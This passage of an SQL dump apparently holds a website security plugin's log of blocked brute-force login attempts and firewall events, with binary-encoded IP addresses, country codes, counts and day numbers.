0��{�?','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��{��','ID',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��|(��','ID',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��|x��','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��|y5','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��|y��','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��|y�J','TH',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��+','HK',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�\n','VN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0��|��','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�f','MY',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��}:w�','JP',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��}:w�','JP',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��}:w�','JP',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��6','ID',10,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��}Ϋ�','JP',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��','VN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��','VN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��}�L1','AU',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0��}�L1','AU',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','IN',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0����I3','SG',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����Qz','SG',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0������','SG',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���ӭ�','CN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����\n','ZA',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�&','CL',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����g$','JP',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���zR','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���z2�','NL',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѐX','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѐX','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѝ�','IN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѝ�','IN',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',2,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0�����@','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','UA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���}7�','FR',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���}��','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����[','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����k�','FI',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���D��','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���D��','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���D�	','GB',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0����dl','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ů�','CA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','IN',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���c{)','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���c{)','SG',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���c� ','AU',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����g','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ļ�','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ļ�','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ļ�','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����/','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����/','CN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�;','US',4,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���]q�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','DE',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�~','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�`','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�q','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�','IN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ʈ�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���ƹ~','US',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����-�','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���\"��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���[J�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���[J�','DE',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K	','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���[L=','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���[L=','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���~߱','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����8','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','FR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�','CA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�!','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','NL',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���B�r','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�5','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����2.','MX',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���8-2','CA',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����G�','FR',2,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0���_g','JP',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���1�','IT',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���1�','IT',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���P��','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#,','FR',1,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Cl','AU',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Cl','AU',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����','CN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���GD','JP',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�n','US',2,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�C','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','BH',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',3,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����&*','GB',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����[�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����e3','IN',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0����e3','IN',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����gI','IN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����gI','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0�����-','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����-','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�L','IR',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���AA�','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',3,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�M','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�-','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Aێ','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���YY�','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���YcD','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���YcD','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���YcD','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���Yt�','CA',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y��','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���d�\'','CH',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����%�','CA',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','JP',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','JP',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���#\r�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���#H','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���#Jh','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���#Jh','DE',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���#t;','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���#t;','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���u,?','SG',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�D','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�D','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18838,'waf'),('\0\0\0\0\0\0\0\0\0\0����@*','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����q~','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����Rs','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����4S','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����6p','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0����6p','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����6p','US',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0����B�','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����B�','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����K�','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����^E','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����^E','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����jQ','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����jQ','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����m','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����ro','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���֖]','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���֗�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���֣%','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���֣%','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���֣%','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���֣%','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���ֻ�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���ּ','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���ּ','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���ּ)','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',3,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����0','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����#X','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0����H�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����h�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����x�','US',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0����I','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0����N�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����=','MY',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����=','MY',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����c�','FR',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����c�','FR',2,18852,'brute'),('\0\0\0\0\0\0\0\0\0\0���4�n','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',3,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���NO','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����A','US',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����A','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���ф','IN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0����]�','US',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���㪽','DE',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���>T�','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0���>T�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���>|�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���>}�','US',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0���Go','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�R','GB',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�8','US',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Gǫ','SG',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���VBe','DE',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���VBe','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���VBe','DE',2,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���VK�','DE',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���VX�','DE',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vw�','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���X�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���cr5','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','CA',3,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','CA',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','CA',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���c�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����8$','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',2,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����[','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0������','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0�����_','DE',1,18845,'b